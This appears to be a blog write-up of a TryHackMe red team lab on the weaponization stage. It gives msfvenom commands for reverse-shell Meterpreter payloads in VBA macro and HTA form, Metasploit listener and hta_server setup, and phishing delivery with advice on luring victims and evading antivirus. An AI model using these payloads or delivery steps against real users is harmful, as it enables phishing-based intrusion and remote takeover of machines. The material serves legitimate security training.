We demonstrated the weaponization phase of the red team engagement. We covered the scenarios in which a red teamer or an attacker would create a weaponized payload whether if its a part of social engineering campaign or a vulnerability exploitation in a web application. Weaponized payloads can come in the form of Microsoft office marco-enabled payloads, HTML application payloads, PDF payloads or with PowerShell. This was part of red team track in TryHackMe platform.
What is Weaponization?
Weaponization is the second stage of the Cyber Kill Chain model. In this stage, the attacker generates and develops their own malicious code using deliverable payloads such as word documents, PDFs, etc. [1]. The weaponization stage aims to use the malicious weapon to exploit the target machine and gain initial access.
Most organizations have Windows OS running, which is going to be a likely target. An organization’s environment policy often blocks downloading and executing .exe files to avoid security violations. Therefore, red teamers rely upon building custom payloads sent via various channels such as phishing campaigns, social engineering, browser or software exploitation, USB, or web methods.
The following graph is an example of weaponization, where a crafted custom PDF or Microsoft Office document is used to deliver a malicious payload. The custom payload is configured to connect back to the command and control environment of the red team infrastructure.
For more information about red team toolkits, please visit the following: a GitHub repository that has it all, including initial access, payload development, delivery methods, and others.
Most organizations block or monitor the execution of .exe files within their controlled environment. For that reason, red teamers rely on executing payloads using other techniques, such as built-in windows scripting technologies. Therefore, this task focuses on various popular and effective scripting techniques, including:
- The Windows Script Host (WSH)
- An HTML Application (HTA)
- Visual Basic Applications (VBA)
- PowerShell (PSH)
Weaponization in Action
Weaponization can be conducted in three main ways:
- Finding and leveraging an exploit in a vulnerable application to deliver a reverse shell.
- Crafting payloads (e.g., using Microsoft Office macros, PowerShell, or Visual Basic Applications) and distributing them via social engineering campaigns. This method is the primary focus of the video.
- Developing and delivering backdoors, often through phishing.
Exploiting Application Vulnerabilities: If an attacker identifies a vulnerability in a web application or another service, they can craft a payload, such as a reverse shell, to exploit this weakness. This shell establishes a connection from the compromised system back to a listener on the attacker’s C2 server.
Social Engineering: This is a common attack vector where attackers create malicious payloads and deliver them to targets through methods like phishing emails or deceptive instant messages.
Creating Backdoors for Persistence: Weaponization also includes the development of backdoors. These can be deployed during the initial compromise or later to ensure persistent access to the target system, even if the initial vulnerability is patched or the user reboots their machine.
Weaponization Through Social Engineering Payloads
The objective is to gain access through social engineering, typically by sending a phishing email with a weaponized attachment. The payload, when executed by the victim, initiates a callback to the attacker’s listener.
Formats of Weaponized Payloads
Weaponized payloads can be delivered in various formats, including:
- Visual Basic scripts
- HTA (HTML Application) files
- Microsoft Office macros (embedded in documents like Word or Excel)
- PDF documents
- Even the social engineering tactics themselves can be considered part of the payload delivery mechanism. These formats are often used to conceal and execute a reverse shell.
Weaponized Microsoft Excel Document with Visual Basic Macros
Generating Visual Basic Reverse Shell Code: The attacker uses a tool like msfvenom to generate the Visual Basic code for a reverse shell. This code includes the attacker’s IP address and a specific port for the listener. A command snippet for msfvenom might look like:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f vba -o payload.vba
Embedding the Payload in an Excel Macro:
- A new Excel document is created.
- The attacker navigates to the “View” tab, selects “Macros,” and creates a new macro.
- This opens the Visual Basic Editor.
- The
msfvenom-generated VBA code is pasted into the editor, replacing any default macro code.
Saving the Document: The Excel file is saved as an “Excel Macro-Enabled Workbook” (with a .xlsm extension). This file is the weaponized payload.
Delivery: The .xlsm file is sent to the victim, typically as an email attachment in a phishing campaign.
Victim Interaction: When the victim opens the Excel document, a security warning will likely appear, indicating that macros are disabled. If the victim is tricked into trusting the source and clicks “Enable Content,” the embedded macro (the reverse shell) executes.
Setting up the Listener: On the attacker’s machine, Metasploit Framework’s msfconsole is used to set up a listener. The commands would be similar to:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit
Successful Connection: Once the victim enables macros in the Excel file, the payload executes, and a Meterpreter session (a powerful type of reverse shell) is established, giving the attacker control over the victim’s machine.
Weaponized HTA (HTML Application) Payload
Generating an HTA Payload: msfvenom is again used, this time to create an HTA payload. The attacker specifies their IP address and listening port. A command snippet for msfvenom might look like:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f hta-psh -o payload.hta
In real-world scenarios, obfuscation techniques like packers would be used to make the payload harder for antivirus software to detect.
Setting up the Listener: Similar to the Excel example, msfconsole and exploit/multi/handler are used to configure and start a listener matching the HTA payload’s settings.
Delivering the HTA Payload: The .hta file can be sent via instant messages or phishing emails.
Alternative Delivery: Metasploit HTA Server Module: We can use an alternative delivery method using Metasploit’s exploit/windows/misc/hta_server module. This module hosts the HTA payload on a web server controlled by the attacker and generates a URL. Configuration in msfconsole:
use exploit/windows/misc/hta_server
set SRVHOST <attacker_ip>
set SRVPORT <hosting_port>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip_for_reverse_shell>
set LPORT <attacker_port_for_reverse_shell>
exploit
This command starts the server and provides a URL (e.g., http://<attacker_ip>:<hosting_port>/<random_name>.hta).
Victim Interaction: The victim is lured into opening this URL in their browser. In a real attack, the URL would likely be shortened or disguised. The browser might display a security warning.
Successful Connection: If the victim runs the HTA application (often by clicking “Open” or “Run” in a browser prompt), the payload executes, establishing a Meterpreter session with the attacker’s listener.
Video Walkthrough
Conclusion
The video article demonstrates how attackers create and deploy weaponized payloads, particularly focusing on Microsoft Office macros and HTA files, as part of the weaponization phase of an attack. It highlights the importance of social engineering in delivering these payloads and the use of tools like Metasploit for both payload generation and listener management. The next video in the series is set to explore PDF and PowerShell-based weaponization.
